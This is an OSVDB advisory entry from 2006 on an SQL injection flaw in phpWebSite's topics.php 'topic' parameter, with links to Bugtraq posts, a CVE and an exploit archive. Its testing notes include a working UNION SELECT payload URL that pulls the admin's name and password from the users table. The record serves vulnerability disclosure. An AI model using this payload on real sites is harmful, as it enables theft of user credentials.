phpWebSite topics.php topic Variable SQL Injection

2006-04-12T19:08:21
ID OSVDB:24688
Type osvdb
Reporter OSVDB
Modified 2006-04-12T19:08:21

Description

Manual Testing Notes

http://[target]/path/topics.php?op=viewtopic&topic=-1 Union select name,name,pass,name From users where uid=1

References:

Vendor URL: http://phpwebsite.appstate.edu/ Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-04/0249.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-04/0290.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-05/0521.html Generic Exploit URL: http://www.milw0rm.com/exploits/1525 CVE-2006-0973 Bugtraq ID: 16825